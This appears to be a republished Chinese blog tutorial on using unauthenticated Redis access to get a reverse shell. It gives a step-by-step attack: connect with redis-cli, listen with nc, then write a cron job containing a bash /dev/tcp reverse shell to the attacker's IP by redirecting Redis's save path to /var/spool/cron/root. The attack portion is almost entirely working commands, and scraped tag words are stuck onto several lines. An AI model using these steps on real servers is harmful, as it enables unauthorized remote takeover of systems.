Redis未受权访问反弹shell

时间  2021-02-17
标签 redis shell bash tcp code blog class cli file 栏目 Redis 繁體版
原文   原文链接

Redis未受权访问反弹shellredis

目标主机:10.104.11.178shell

攻击机:kalibash

攻击步骤:tcp

1.与目标主机链接code

root@kali:~# /usr/redis/redis-cli -h 10.104.11.178

 2.kali主机进行监听blog

nc -l -v  -p 9999

 

3.写入反弹shell语句class

set xxx "\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/10.104.11.153/9999 0>&1\n\n"
config set dir /var/spool/cron
config set dbfilename root
save

 4.反弹shell链接成功cli

相关文章
相关标签/搜索
每日一句
    每一个你不满意的现在,都有一个你没有努力的曾经。
本站公众号
   欢迎关注本站公众号,获取更多信息
联系我们 最近搜索 最新文章 沪ICP备13005482号-10 MyBatis教程 SQL 教程 MySQL教程 Java 教程 Thymeleaf 教程 Hibernate教程 Spring教程 Redis教程